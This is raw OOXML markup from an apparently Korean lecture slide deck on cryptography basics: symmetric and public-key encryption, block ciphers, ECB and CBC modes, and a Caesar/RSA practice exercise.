<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide300.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.jpeg"/><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40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00.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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide408.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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0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slide" Target="slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.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slide" Target="slide428.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide41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1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2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06.xml"/><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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide425.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide425.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28.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide424.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12.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide42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24.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80.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide429.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4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30.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428.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431.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87.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kocw.net/home/search/kemView.do?kemId=978503" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43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321.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image" Target="../media/image58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428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.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archive.ubuntu.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.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slide" Target="slide428.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/" TargetMode="External"/><Relationship Id="rId9"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slide" Target="slide157.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide186.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide225.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide134.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide241.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide220.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide216.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide230.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide160.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide208.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide186.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide134.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.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5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slide" Target="slide48.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5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101.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide53.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54.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55.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56.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide68.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide73.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide59.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide77.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide67.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide72.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide71.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide75.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide62.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide66.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide61.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide70.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide65.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide74.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide60.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide64.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide69.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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6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428.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428.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slide" Target="slide85.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide94.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide82.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide91.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide98.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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81.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83.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8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slide" Target="slide4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jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.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81.xml"/><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slide" Target="slide428.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><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428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide90.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81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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4.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.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slide" Target="slide81.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><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slide" Target="slide81.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide96.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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide97.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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.xml"/><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slide" Target="slide42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0520"/>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0520"/>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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>시저</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en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>rsa</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암호 실습</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26915567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hlinkClick r:id="rId8" action="ppaction://hlinkfile"/>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887040321"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3693381" y="2564266"/>
          <a:ext cx="3959749" cy="1968311"/>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Block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Block </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</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err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화 키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>복호화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필요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="RAON CTF - WEB Essential">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B96E0AD-7A00-4F5D-99E8-561C8EACC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848" y="2507273"/>
            <a:ext cx="6330043" cy="355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99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a:t>비대칭키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646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공개키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>모든 사람이 접근 가능한 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개인키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자만이 가지고 있는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할 필요가 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7AB115-6086-416B-865A-083B9F33B6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1826077" y="2755354"/>
            <a:ext cx="8215995" cy="3220071"/>
            <a:chOff x="1826077" y="2755354"/>
            <a:chExt cx="8215995" cy="3220071"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3074" name="Picture 2" descr="암호학] 대칭키 vs 공개키(비대칭키) 암호화 차이">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B23294-EF48-4C92-ABFC-131066802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077" y="2755354"/>
              <a:ext cx="8215995" cy="322007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38D53DBE-80BE-4784-886F-13A48E670B09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8156121" y="5412921"/>
              <a:ext cx="1869622" cy="46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221886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63" y="2938348"/>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700" kern="0" dirty="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실행 단추: 문서 32">
            <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8E6399-6C6C-45E1-8F02-79DA716AD5BF}"/>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69693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C8F985A5-BC79-4AFA-8536-92790B70CA5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개인키와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B1898AA4-44B7-43D9-B184-DD83185EB435}"/>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85474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F8907B7-D4F7-4235-B145-39E62E05E639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956000" y="2136338"/>
            <a:ext cx="8555393" cy="2585323"/>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Block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>암호란</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>평문을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 블록 단위로 암호화하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 암호 시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>블록 단위로 암호화를 한다는 의미</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암호화 방식을 정할 때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>임의의 길이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>평문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 대해 고민할 필요가 없이 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고정된 길이의 각 블록을 암호화하는 방식만 정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103402140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descr="Investigating Block Cipher Modes with DPA - ChipWhisperer Wiki">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B98D54A-7CA4-4B9A-BB3A-7A15B2825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024" y="4048126"/>
            <a:ext cx="572452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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A60F17C-3CAD-454D-AA47-8D58501F7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2038"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ECB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같음</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40211114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CBC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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Block cipher mode of operation - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22325523-97EE-4987-B776-7E3C4547A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28" y="4195033"/>
            <a:ext cx="57150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33AFA75D-EBCB-4074-AA96-3A8797416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5780" y="1929829"/>
            <a:ext cx="1585912" cy="1879156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13928227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실행 단추: 문서 14">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C642B003-6020-4FE7-AA7E-45DA4D6257C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9299644" y="3527960"/>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5B20F288-DE2B-4404-9C20-09AC05312DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="1791005"/>
            <a:ext cx="5563710" cy="4507222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5DD02C1-4E61-4FAF-B719-6BF37EFED382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7807068" y="4283098"/>
            <a:ext cx="3505689" cy="1486107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64626EF-629B-4315-A333-5D73F4F5690A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715615" y="2917098"/>
            <a:ext cx="1688592" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>AES.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25746967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811" y="2324145"/>
            <a:ext cx="2421195" cy="18261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2171" y="1104272"/>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3940"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삼성이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>13% </a:t>
            </a:r>
